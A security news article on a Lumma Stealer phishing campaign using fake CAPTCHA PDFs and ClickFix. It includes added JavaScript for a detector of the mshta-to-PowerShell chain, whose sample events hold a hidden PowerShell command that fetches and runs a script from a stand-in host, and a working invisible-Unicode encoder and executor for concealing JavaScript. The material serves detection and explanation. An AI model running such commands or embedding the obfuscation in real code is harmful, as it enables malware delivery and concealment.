Security researchers have uncovered a widespread phishing campaign that uses fake CAPTCHA images embedded in PDF documents hosted on Webflow's content delivery network (CDN) to deliver the Lumma Stealer malware.
According to Netskope Threat Labs, 260 unique domains host 5,000 phishing PDF files that redirect users to malicious websites.
In a statement shared with The Hacker News, security researcher Jan Michael Alcantara said the attacker "uses SEO to trick victims into visiting the pages by clicking on malicious search engine results."
While most of the phishing pages focus on stealing credit card information, some of the PDF files contain fake CAPTCHAs that trick victims into running malicious PowerShell commands, ultimately leading to the Lumma Stealer malware.
The phishing campaign has reportedly affected more than 1,150 organizations and more than 7,000 users since the second half of 2024, with the attacks primarily targeting victims in North America, Asia, and Southern Europe across the manufacturing, technology, and financial services sectors.
The majority of the 260 domains identified are related to Webflow, followed by those related to GoDaddy, Strikingly, Wix, and Fastly.
The attackers have also been observed uploading some of the PDF files to legitimate online libraries and archives such as PDFCOFFEE, PDF4PRO, PDFBean, and the Internet Archive, so that users searching for PDF files on search engines are led to them.
The PDF files contain fake CAPTCHA images that act as a lure for capturing credit card details. In the case of the files distributing Lumma Stealer, the embedded image instead takes the victim to a malicious website when the document is clicked.
That website masquerades as a fake CAPTCHA verification page and uses the ClickFix technique to trick the victim into running an MSHTA command, which in turn executes a PowerShell script that launches the stealer malware.
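The process chain just described is where an endpoint detection can intervene: legitimate software almost never has explorer.exe launch mshta.exe with a remote URL, let alone mshta.exe spawning PowerShell. The following is an added example, written for this page rather than taken from the article, Netskope, or any vendor, of a small detector for that chain run over constructed process-creation events loosely shaped like Sysmon Event ID 1 records; the field names, paths, hostnames, and command lines are assumptions.

```javascript
// Added example (not from the article or any vendor): a minimal detector for
// the ClickFix -> mshta.exe -> PowerShell chain, run over constructed
// process-creation events. Field names, paths and hostnames are assumptions.

const sampleEvents = [ // constructed sample data, not real telemetry
  { pid: 4120, ppid: 1200, image: "C:\\Windows\\explorer.exe",
    parentImage: "C:\\Windows\\System32\\winlogon.exe", cmd: "explorer.exe" },
  // ClickFix step: the user pastes the copied command into the Win+R dialog
  { pid: 5032, ppid: 4120, image: "C:\\Windows\\System32\\mshta.exe",
    parentImage: "C:\\Windows\\explorer.exe",
    cmd: "mshta https://captcha.example.invalid/verify" },
  // The HTA then launches PowerShell to fetch and run the next stage
  { pid: 5100, ppid: 5032,
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    parentImage: "C:\\Windows\\System32\\mshta.exe",
    cmd: "powershell -w hidden -ep bypass -c \"iex (irm https://captcha.example.invalid/p.ps1)\"" },
  // Benign: an administrator opening PowerShell interactively
  { pid: 6000, ppid: 4120,
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    parentImage: "C:\\Windows\\explorer.exe", cmd: "powershell -NoProfile" },
  // Lower confidence: mshta running a local HTA shipped with a product
  { pid: 6100, ppid: 4120, image: "C:\\Windows\\System32\\mshta.exe",
    parentImage: "C:\\Windows\\explorer.exe",
    cmd: "mshta \"C:\\Program Files\\Vendor\\setup.hta\"" },
];

// File name of an image path, lower-cased, so rules ignore directory and case.
function baseName(path) {
  return path.split(/[\\/]/).pop().toLowerCase();
}

// Each rule inspects one event. The two high-severity rules key on the
// parent/child relation that ClickFix produces and legitimate software rarely does.
const RULES = [
  { id: "mshta-remote-url", severity: "high",
    match: e => baseName(e.image) === "mshta.exe" && /\bhttps?:\/\//i.test(e.cmd) },
  { id: "powershell-spawned-by-mshta", severity: "high",
    match: e => baseName(e.image) === "powershell.exe" && baseName(e.parentImage) === "mshta.exe" },
  { id: "powershell-hidden-window-bypass", severity: "medium",
    match: e => baseName(e.image) === "powershell.exe"
      && /-w(indowstyle)?\s+hidden/i.test(e.cmd)
      && /-e(xecutionpolicy|p)\s+bypass/i.test(e.cmd) },
];

// Walk ppid links to render the process ancestry, falling back to the recorded
// parentImage when the parent's own event is not in the batch.
function ancestry(events, pid) {
  const byPid = new Map(events.map(e => [e.pid, e]));
  const chain = [];
  let e = byPid.get(pid);
  while (e) {
    chain.unshift(baseName(e.image));
    const parent = byPid.get(e.ppid);
    if (!parent) { chain.unshift(baseName(e.parentImage)); break; }
    e = parent;
  }
  return chain.join(" > ");
}

// Returns one alert per matching (event, rule) pair, in event order.
function detectClickFix(events) {
  const alerts = [];
  for (const e of events) {
    for (const rule of RULES) {
      if (rule.match(e)) {
        alerts.push({ pid: e.pid, rule: rule.id, severity: rule.severity,
                      chain: ancestry(events, e.pid), cmd: e.cmd });
      }
    }
  }
  return alerts;
}

for (const a of detectClickFix(sampleEvents)) {
  console.log(`[${a.severity}] ${a.rule} pid=${a.pid} ${a.chain}`);
}
```

On the constructed batch the detector raises three alerts, all on the two ClickFix processes, and none on the interactive PowerShell session or the locally installed HTA. In production the same rules would be fed from Sysmon or EDR process-creation telemetry, and the ancestry string is what an analyst wants first when triaging.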
Lumma Stealer has also recently been distributed disguised as Roblox games and as a cracked version of the Windows file manager Total Commander, highlighting the variety of delivery methods used by multiple threat actors. Users are funneled to these sites by YouTube videos that were most likely uploaded from recently compromised accounts.
"Malicious links and infected files are frequently hidden in YouTube videos, comments, or descriptions," according to Silent Push. "When engaging with YouTube content, especially when prompted to download or click on links, exercising caution and being wary of unverified sources can help safeguard against these growing threats."
The cybersecurity firm also found that Lumma Stealer logs are being offered for free on a relatively new hacking forum called Leaky[.]pro, which became operational in late December 2024.
Lumma Stealer is a stealer malware sold under the malware-as-a-service (MaaS) model, allowing its customers to harvest a wide range of information from compromised Windows hosts. In early 2024, the malware's operators announced an integration with GhostSocks, a Golang-based proxy malware.
For threat actors, adding a SOCKS5 backconnect capability to existing Lumma infections, or to any other malware for that matter, is highly lucrative, according to Infrawatch.
By routing traffic through victims' internet connections, attackers can bypass geographic restrictions and IP-based integrity checks, particularly those enforced by financial institutions and other high-value targets. This capability significantly increases the likelihood that unauthorized access attempts using credentials harvested from infostealer logs will succeed, thereby enhancing the post-exploitation potential of Lumma infections.
Stealer malware such as Atomic macOS Stealer is also being distributed using the ClickFix technique through lures themed around the DeepSeek artificial intelligence (AI) chatbot, according to two separate reports.
Phishing attacks have also been observed using a JavaScript obfuscation technique that relies on invisible Unicode characters to represent binary values, a technique first documented in October 2024.
The technique uses Unicode filler characters, specifically the Hangul half-width filler (U+FFA0) and the Hangul filler (U+3164), to represent the binary values 0 and 1, respectively, converting each ASCII character of the JavaScript payload into an eight-character sequence of these invisible fillers. The sequence renders as blank space in an editor, can be stored in an ordinary string, and is decoded back into executable code at runtime.
The attacks were highly personalized, incorporating non-public information, and the initial JavaScript attempted to invoke a debugger breakpoint if it was being analyzed, detect the resulting delay, and abort the attack by redirecting to a benign website, according to Juniper Threat Labs.
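To make the encoding concrete, here is an added example, written for this page and not taken from the attackers' samples or from Juniper's write-up, that implements the filler-character encoder and decoder described above, shows that the decoded text is live JavaScript, and adds the check a defender wants: a scanner that finds runs of these two fillers in script text and decodes them. The payload and the script it is hidden in are constructed.

```javascript
// Added example (not the attackers' code and not from Juniper's report):
// encoder, decoder and scanner for the invisible-Unicode JavaScript
// obfuscation. The sample payload and script text below are constructed.

const ZERO = "\uFFA0"; // HALFWIDTH HANGUL FILLER, stands for bit 0
const ONE  = "\u3164"; // HANGUL FILLER, stands for bit 1

// Turn each 8-bit character of the payload into eight invisible characters.
function encodeInvisible(payload) {
  let hidden = "";
  for (const ch of payload) {
    const code = ch.charCodeAt(0);
    if (code > 0xff) throw new Error("payload must be 8-bit characters");
    for (const bit of code.toString(2).padStart(8, "0")) {
      hidden += bit === "1" ? ONE : ZERO;
    }
  }
  return hidden;
}

// Reverse of encodeInvisible: each group of eight fillers becomes one character.
function decodeInvisible(hidden) {
  if (hidden.length % 8 !== 0) throw new Error("length is not a multiple of 8");
  let text = "";
  for (let i = 0; i < hidden.length; i += 8) {
    let code = 0;
    for (let j = 0; j < 8; j++) {
      const c = hidden[i + j];
      if (c !== ZERO && c !== ONE) throw new Error("not a filler character");
      code = (code << 1) | (c === ONE ? 1 : 0);
    }
    text += String.fromCharCode(code);
  }
  return text;
}

// What a loader stage does with the hidden text: decode it and run it. Shown
// plainly here to make the point that the decoded string is live code; real
// samples disguise this step further.
function executeHidden(hidden) {
  return new Function(decodeInvisible(hidden))();
}

// Defender side: find runs of filler characters in script text and decode
// them. Legitimate source code has no reason to contain eight or more in a row.
const FILLER_RUN = /[\uFFA0\u3164]{8,}/g;
function findHiddenPayloads(scriptText) {
  const findings = [];
  for (const m of scriptText.matchAll(FILLER_RUN)) {
    const run = m[0].slice(0, m[0].length - (m[0].length % 8)); // whole bytes only
    findings.push({ offset: m.index, chars: m[0].length, decoded: decodeInvisible(run) });
  }
  return findings;
}

// Constructed sample: a script that reads as harmless but carries a hidden payload.
const hiddenPayload = encodeInvisible("return 6 * 7;");
const sampleScript =
  'const k = "' + hiddenPayload + '";\n' +
  'document.title = "Please verify you are human";\n';

console.log(findHiddenPayloads(sampleScript));
```

The scanner is deliberately narrow: it only recognises the two code points this campaign used. Other invisible or zero-width characters (U+200B, U+200C, U+200D, U+2060, U+FEFF) can carry the same trick with a different alphabet, so a production check should flag any long run of format or filler characters inside string literals rather than decode only this pair.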